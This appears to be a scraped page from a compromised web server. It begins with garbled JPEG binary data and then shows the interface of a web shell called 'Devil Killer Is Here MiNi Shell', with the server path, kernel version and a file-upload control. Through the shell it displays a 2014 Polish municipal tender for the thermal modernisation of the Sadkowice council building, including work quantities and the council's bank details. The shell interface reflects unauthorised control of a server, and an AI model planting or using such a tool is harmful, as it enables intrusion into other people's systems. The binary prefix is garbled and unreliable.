JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/159567-N-2014.html

<p class="kh_header"><b>Sadkowice: Termomodernizacja budynku Urzędy Gminy w Sadkowicach</b><br>
<b>Numer ogłoszenia: 159567 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 46 8156191, faks 46 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminasadkowice.pl; http://www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Urzędy Gminy w Sadkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana stolarki okiennej i drzwiowej obejmuje okna drewniane (oznaczone jako S oraz zamurowane luksferami szt. 2 - licząc od góry klatki schodowej).
Projektuje się nowe okna jednoramowe, dwu-szybowe o skrzydłach uchylnych (U) i rozwieralno-uchylnych (R-U) otwieranych do wewnątrz. Wykonane z profili plastikowych PCV szklone szybą podwójną zespoloną niskoemisyjną termofloat o współczynniku przenikania ciepła dla szyb wynoszącym Uszyb = 1,1 W/m2xK.
Współczynnik przenikania ciepła dla całego okna Uokna = 1,3 W/ m2xK.

W piwnicy, parterze (oznaczone jako PA oraz zamurowane luksferami - 3 szt. licząc od dołu klatki schodowej) budynku okna z szybami antywłamaniowymi o klasie odporności na włamanie oszklenia P4 i przewidywanej klasie odporności okna na włamanie RC2.
Okna z funkcją mikrouchylania (rozszczelniania) i nawiewnikami higrosterowalnymi montowanymi w górnej ramie każdego okna. Nawiewniki minimum po 1 szt. w oknie o wydajności 5-35 m3/h.
Profil min. trzy komorowy ze wzmocnieniami stalowymi. W ramie profil zamknięty.
W załączonym wykazie stolarki okiennej przewidzianej do montażu, pokazano sposób i kierunek otwierania skrzydeł okiennych.

Przewidziano wymianę istniejących drzwi zewnętrznych (oznaczone jako S).
Nowe drzwi wykonać z profili aluminiowych pełnych z samozamykaczem o regulowanej prędkości zamykania i samodomykaczem oraz okuciem przeciwpanicznym nawierzchniowym zgodnym z normą EN 1125:1997/A:2001. Kwatery górna i dolna to standardowy pełny panel aluminiowy ciepły.
Współczynnik przenikania ciepła dla całych drzwi Udrzwi = 1,5 W/ m2xK. Izolacyjności akustyczna Rw= 28-53 dB. Drzwi do składu opalu wymienić na stalowe.
W wymienionych drzwiach zewnętrznych zastosować samozamykacz typu GEZE 2000V, zamki drzwiowe główne wpuszczane podklamkowe zasuwkowe i dodatkowe zasuwkowe, wkładki bębenkowe standardowe np. typu Yale.
Drzwi wejściowe do budynku muszą mieć w świetle ościeżnic co najmniej szerokość 90 cm
i wysokość 200 cm. W drzwiach zewnętrznych dwuskrzydłowych szerokość głównego skrzydła min. 90 cm w świetle ościeżnicy. Drzwi ewakuacyjne z budynku muszą otwierać się na zewnątrz.
Zagospodarowanie zdemontowanej stolarki po stronie wykonawcy robót.

Zakłada się ocieplenie ścian zewnętrznych pomieszczeń budynku należących do Gminy Sadkowice i Banku Spółdzielczego Ziemi Łowickiej. Parter do wysokości nadproży okiennych należy wzmocnić dodatkowo podwójna siatką zbrojącą odporną na ewentualne uszkodzenia mechaniczne powłoki tynkarskiej.

Ocieplenie ścian zewnętrznych nadziemia (nad cokołem) styropianem samo gasnącym
(współczynnik X=0,03) o współczynniku przewodności cieplnej L=0,038 W/mxK o gr. 14,0 cm metodą lekką mokrą. Na cokole polistyren ekstrudowany (XPS) L =0,038 W/mxK o gr. 14,0 cm.
Ocieplenie podcienia schodów styropianem samo-gasnącym (współczynnik X=0,03) o współczynniku przewodności cieplnej L=0,038 W/mxK o gr. 18,0 cm metodą lekką mokrą.
Wymiana drewnianych okien na okna z profili PVC (piwnica i częściowo parter z szybami
antywłamaniowymi o klasie odporności na włamanie oszklenia P4 i przewidywaną klasą odporności okna na włamanie RC2) oraz wymiana zewnętrznych drzwi drewnianych i stalowych na drzwi aluminiowe pełne (do składu opału na stalowe).

W dokumentacji projektowej i rysunkach detali budowlanych nie wskazano konkretnej technologii ocieplenia związanej z występującymi na rynku firmami oferującymi swoje wyroby. Wskazano jedynie metodę jako bez spoinową (BSO). Zastosowany system musi posiadać decyzję ITB dopuszczającą do stosowania oraz certyfikat zgodności.
System musi posiadać aprobatę techniczną jako nierozprzestrzeniający ognia (NRO).

Przyjęto zewnętrzne wykończenie w całości tynkami mineralnymi baranek 2,0 mm wg. ogólnego wzornika kolorów NCS . Tynki mineralne pomalować farbami silikatowymi .
Wyróżniono cokół o wys. 60 cm (w najniższym punkcie terenu) nad opaską budynku zgodnie z przyjętą kolorystyką elewacji.

Z uwagi na stan podłoża na zewnętrznych ścianach budynku / zawilgocenia i odparzenia tynku zakłada się usunięcie ok. 15-25 % tynków głównie w partiach cokołowych. Po sprawdzeniu ostrym narzędziem, że fragmenty podłoża kruszą się i odpadają, należy przyjąć je za nieodpowiednie i wykonać w tym miejscu nowe tynki cementowo-wapienne. Pozostałe podłoża należy zagruntować emulsją gruntującą w celu zwiększenia przyczepności warstw ocieplenia . Ościeża ram okiennych muszą być ocieplone styropianem gr. 2,0 cm tak aby zmieścić się w szerokości widocznej ramy okna . Istniejące kraty usytuowane w oknach należy zdemontować i przekazać inwestorowi .

Ocieplenie cokołu z płyt (60x125 cm) o gęstości 30 kg/m3 z polistyrenu ekstrudowanego (XPS) o gr. 14,0 cm i wys. 60 cm (w najniższym punkcie terenu) od opaski.
Mocować do ścian na zaprawie klejowej do ścian kondygnacji nadziemnych .
Powyżej poziomu terenu warstwy dociepleniowe wykonać należy metodą lekką z wykończeniem z tynku mineralnego baranek 2,0 mm. Na styku z cokołem w poziomie terenu należy wyregulować i uzupełnić ubytki istniejącej opaski betonowej ze spadkiem od lica ściany ok. 1,5 - 2,0 %.

Projektuje się dodatkowe mocowanie styropianu do ściany na kołki rozprężne z trzpieniem i talerzykami dociskowymi o średnicy o 6,0 cm w rozstawie mocowania 6 szt./m powierzchni z zagęszczeniem kołków w narożnikach budynku do 8 szt./m2. Głębokość kotwienia kołków w ścianie 8,0 cm .

Projektuje się wymianę: podokienników zewnętrznych w oknach pomieszczeń należących do Gminy Sadkowice oraz Banku Spółdzielczego Ziemi Łowickiej na wykonane z blachy ocynkowanej powlekanej gr. 0,50 mm (mocowane na piankę montażową). Wymianie podlegają również wszystkie rury spustowe na wykonane z blachy ocynkowanej powlekanej gr. 0,50 mm. Pozostałe obróbki jak pasy pod-rynnowe, nad-rynnowe i rynny dachowe nie podlegają wymianie. Należy uwzględnić konieczność naprawy i pomalowania pasów pod-rynnowych (obróbki gzymsów) lub alternatywnie wykonanie nowej obróbki z blachy ocynkowanej powlekanej gr. 0,50 mm.
Szczegółowy zakres robót:
Termomodernizacja budynku Urzędy Gminy w Sadkowicach
w tym:
Zadanie Nr 1:
WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ w Budynku UG w Sadkowicach
1. Wykucie z muru ościeżnic drewnianych o pow.ponad 2
m2 - drzwi wejściowe m2 3,52
2. Wykucie z muru ościeżnic stalowych lub krat drzwiowych o pow.do 2 m2 szt 1,00
3. Wykucie z muru ościeżnic stalowych lub krat drzwiowych o pow.ponad 2 m2 m2 4,00
4. Drzwi przymykowe aluminiowe- (1x ront + 2x podwórze) m2 5,52
5. Drzwi stalowe pełne o pow.do 2 m2 - skład opału m2 1,40
6. Wykucie z muru ościeżnic drewnianych (okna)  m2  69,94
7. Montaż okien rozwieranych i uchylno-rozwieranych jednodzielnych z PCV z obróbką obsadzenia o pow. do 1.0 m2 - piwnice antywłamaniowe P4.  m2  4,86
8. Montaż okien rozwieranych i uchylno-rozwieranych jednodzielnych z PCV z obróbką obsadzenia o pow. do 1.5 m2  m2  30,38
9. Montaż okien rozwieranych i uchylno-rozwieranych jednodzielnych z PCV z obróbką obsadzenia o pow. do 1.5 m2 - ( szt.15 i klatka szt.3 antywłamaniowe P4)  m2  20,37
10. Montaż okien rozwieranych i uchylno-rozwieranych jednodzielnych z PCV z obróbką obsadzenia o pow. ponad 1.5 m2  m2  1,80
11. Montaż okien rozwieranych i uchylno-rozwieranych dwudzielne z PCV z obróbką obsadzenia o pow. ponad 2.5 m2  m2  25,20
12. Wykon.tynków zwykłych wewnętrznych kat.III z zaprawy cem.-wap. na ościeżach szer.ponad 15cm  m  264,90
13. Wykon.tynków zwykłych zewnętrznych kat.III z zaprawy cem.-wap. na ościeżach szer.ponad 15 cm  m  264,90
14. Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian  m2  52,98

Zadanie Nr 2:
DOCIEPLENIE ŚCIAN ZEWNĘTRZNYCH ZE ZMIANĄ KOLORYSTYKI Budynku UG w Sadkowicach
1. Osłony okien i drzwi folią polietylenowa  m2  392,40
2. Przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą - oczyszczenie mechaniczne i zmycie  m2  659,78
3. Przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą - jednokrotne gruntowanie emulsją gruntującą  m2  566,18
4. Przygotowanie starego podłoża pod docieplenie metodą lekką-mokrą - sprawdzenie przyczepności zaprawy klejącej do podłoża  m2  8,00
5. Docieplenie ścian płytami styropianowymi EPS70-040 / dawny FS 15/ gr 14 cm - przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. tynk akrylowy baranek gr 2,0 mm  m2  365,71
6. Docieplenie podcienia płytami styropianowymi EPS70- 040 /dawny FS 15/ gr 18 cm - przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. tynk akrylowy baranek gr 2,0 mm -( podcień schodowy oraz pogrubienie na cokole w związku z jego obniżeniem)  m2  80,56
7. Ocieplenie ścian budynków płytami styropianowymi - ochrona narożników kątownikiem metalowym  m  493,77
8. Docieplenie ościeży o szer. 0,30 cm płytami styropianowymi gr. 3 cm- przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. Mieszanki akrylowej  m2  112,70
9. Rusztowania zewnętrzne rurowe o wys.do 10 m  m2  584,50
10. Czas pracy rusztowań  godz.  462,00
11. Osłony z siatki na rusztowaniach zewnętrznych  m2  584,50
12. Wykucie z muru ościeżnic stalowych lub krat drzwiowych o powierzchni ponad 2 m2 - kraty okienne  m2  138,50
13. Odbicie tynków wewn. z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o pow. odbicia do 5 m2 - tynk odparzony  m2  38,50
14. Uzupełnienie tynków zewnętrznych cementowych kat.III o podłożach z cegły, pustaków,  m2  37,30
15. Rozebranie chodników,wysepek przystankowych i przejść dla pieszych z płyt betonowych 50x50x7 cm na podsypce piaskowej  m2  46,82
16. Chodniki z płyt betonowych 50x50x7 cm na podsypce cem. piaskowej z wyp. spoin zapr. cem.  m2  46,82
17. Warstwy podsypkowe cementowo-piaskowe zagęszczane ręcznie o gr.5 cm  m2  46,82
18. Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową  m  93,63
19. Przemurow. ciągłe pęknieć o głęb. 1/2 ceg. przy użyciu zapr. cem. w ścianach z cegieł na zaprawie cementowowapiennej  m  17,00
20. Rozebranie rur spustowych z blachy nie nadającej się do użytku  m  73,53
21. Rury spustowe okrągłe o śr.12cm - z blachy ocynkowanej- powlekanej  m  73,53
22. Rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku-podokienniki zewnętrzne  m2  23,70
23. Obróbki przy szer.w rozw.ponad 25cm - z blachy ocynkowanej powlekanej-podokienniki zewnętrzne  m2  32,17
24. Obsadzenie kratek wentylacyjnych w ścianach z cegieł i na kominach.  szt  26,00
25. Uzupełnienie tynków zewnętrznych zwykłych kat.III o podłożach z cegły,pustaków,gazo-i pianobetonów (do 2 m2 w 1 miejscu)  m2  5,70
26. Przemurowanie kominów z cegieł o objętości w jednym miejscu do 0.5 m3  m3  0,38
27. Przemurowanie przewodów kominowych - sprawdzenie przewodów  m  31,20
28. Przemurowanie przewodów kominowych - odgruzowanie przewodów  m  12,70
29. Rozbiórka elementów konstrukcji betonowych niezbrojonych o grub.do 15 cm  m3  2,30
30. Docieplenie ścian z cegły płytami styropianowymi przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. Suchej mieszanki - cokół  m2  37,80
31. Ocieplenie ścian budynków płytami styropianowymi - system STOPTER - zamocowanie listwy cokołowej  m  25,95
32. Rozebranie ścianki z pustaków szklanych  m2  5,87
33. Naprawienie uszkodzonych w murze powierzchni do 0.25 m2  szt  14,00
34. Uzupełnienie tynków zewnętrznych cementowych kat.III o podłożach z cegły,pustaków,gazo-i pianobetonów  m2  21,74
35. Wywiezienie gruzu spryzmowanego samochodami na odl.do 1 km  m3  9,24
36. Wywiezienie gruzu spryzmowanego samochodami i - za każdy nast. 1 km
Krotność = 4  m3  9,24
37. Demontaż wsporników instalacji odgromowej i uziemiającej ze ściany nie betonowej  szt  79,00
38. Demontaż przewodów uziemiajacych i odgromowych z pręta o przekroju do 120 mm2 mocowanych na wspornikach na ścianie w ciągu pionowym  m  144,70
39. Rury winidurowe o śr. do 28 mm układane n.t. na gotowych uchwytach  m  3,70
40. Montaż przewodów instalacji odgromowej  m  144,70
41. Montaż skrzynek i rozdzielnic skrzynkowych o masie do 10kg wraz z konstrukcją - mocowanie przez zabetonowanie w gotowych otworach  szt  2,00
42. Badania i pomiary instalacji piorunochronnej (pierwszy pomiar)  szt  13,00
43. Badania i pomiary instalacji piorunochronnej (każdy następny pomiar)  szt  8,00
44. Dwukrotne malowanie farbą olejną powierzchni
metal. (drzwiczki, włazy)   m2  2,20
45. Demontaż i ponowny montaż z przedłużeniem wsporników z oczyszczeniem i pomalowaniem tablic napis  szt  1,00
46. Kratki wentylacyjne prostokątne w kanałach murowanych o obwodzie do 1600 mm  szt  2,00
1. Zamówienie obejmuje wykonanie kosztorysów powykonawczych.
2. Zamówienie należy realizować w określonej kolejności, zgodnie z numeracją zadań.

3. Wykonawca przed złożeniem oferty cenowej powinien dokładnie zapoznać się z dokumentacją łącznie z uzgodnieniami i warunkami technicznymi (wraz ze sprawdzeniem wszystkich wymiarów w projektach oraz ilości wymienionych w przedmiarach robót) a także dokonać oględzin terenu oraz budynku gdzie będzie realizowana inwestycja aby w razie stwierdzonych niejasności domagać się od Zamawiającego wyjaśnień.

4. Jeżeli w załącznikach do SIWZ pojawią się ewentualne wskazania znaków towarowych, patentów lub pochodzenia, to określają one minimalny standard jakości materiałów lub urządzeń przyjętych przykładowo do wyceny. Zamawiający dopuszcza zastosowanie produktu innego producenta o parametrach równoważnych lecz nie gorszych niż przyjęto w dokumentacji technicznej. Wskazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy.

5. Oferta musi uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności oferty, która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko to co może być konieczne dla właściwego wykonania i wykończenia robót oraz usunięcia usterek.

6. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z projektami budowlanymi i pozostałą dokumentacją. Z uwagi na to, że umowa na roboty będzie umową z wynagrodzeniem ryczałtowym w przypadku wystąpienia w trakcie prowadzenia robót większej ilości robót lub materiałów niż przewidziano w jakiejkolwiek pozycji przedmiaru nie będzie to uznane za roboty dodatkowe z żądaniem dodatkowego wynagrodzenia lecz jako konieczne roboty i materiały, które Wykonawca zobowiązany jest wykonać i dostarczyć w ramach ceny określonej w ofercie. Ewentualne braki w przedmiarze robót w robotach lub materiałach, które są konieczne do wykonania kompletnego zadania na podstawie projektów budowlanych, wykonawczych, specyfikacji technicznej, dokumentacji formalno-prawnej lub SIWZ nie zwalniają wykonawcy z obowiązku ich wykonania, wykonawca ma obowiązek wykonać wszystkie konieczne roboty i dostarczyć wszystkie materiały w ramach wynagrodzenia ryczałtowego określonego w umowie, która będzie zawarta w ramach niniejszego zamówienia publicznego.
7. Wykonawca jest ponadto zobowiązany do wykonania i utrzymania na własny koszt wykonanego oznakowania tymczasowego robót przez cały okres realizacji, a także jego demontażu po robotach i powinien to uwzględnić w cenie ofertowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości:
7 000 zł /słownie: siedem tysięcy złotych 0/100 
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
- w pieniądzu.
 - w poręczeniach bankowych lub poręczeniach spółdzielczej kasy -
oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
 - w gwarancjach bankowych;
 - w gwarancjach ubezpieczeniowych
 - w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z pózn. zm.)
4. W przypadku wnoszenia wadium w formie pieniądza, wpłaty należy dokonać przelewem na rachunek bankowy Zamawiającego tj.:
Urząd Gminy Sadkowice 09 9291 0001 0035 8648 2000 0010 BS BR o/Sadkowice
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ, zostanie wykluczony z postępowania.
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.
8. Zamawiający zwróci wadium wykonawcy, którego oferta została wybrana, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 ustawy , nie złożył dokumentów, oświadczeń lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a). odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach 
określonych w ofercie;
b). zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy, ze posiada uprawnienia do wykonywania określonej działalności lub czynności wg wzoru (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy o spełnianiu w/w warunków wg wzoru (Załącznik nr 4 do SIWZ) i przedłoży dokumenty potwierdzające posiadane doświadczenie zawodowe oraz wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia wyszczególniony w formularzu kosztorysu ofertowego oraz opisie przedmiotu zamówienia. Wykonawca zobowiązany jest dołączyć do oferty referencje wystawione przez zamawiających potwierdzające, że powyższe roboty zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy o spełnianiu w/w warunku wg wzoru (Załącznik nr 4 do SIWZ) i przedstawi dokumenty potwierdzające iż Wykonawca ma do dyspozycji odpowiednio wykwalifikowaną kadrę pracowników posiadającą kwalifikacje określone poniżej min. :
- Kierownik budowy - osoba posiadająca kwalifikacje i doświadczenie w samodzielnym kierowaniu robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń , posiadająca co najmniej 3 lata uprawnienia budowlane o w/w specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca przedstawi aktualną opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w kwocie obejmującej co najmniej zakres przewidywanego zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
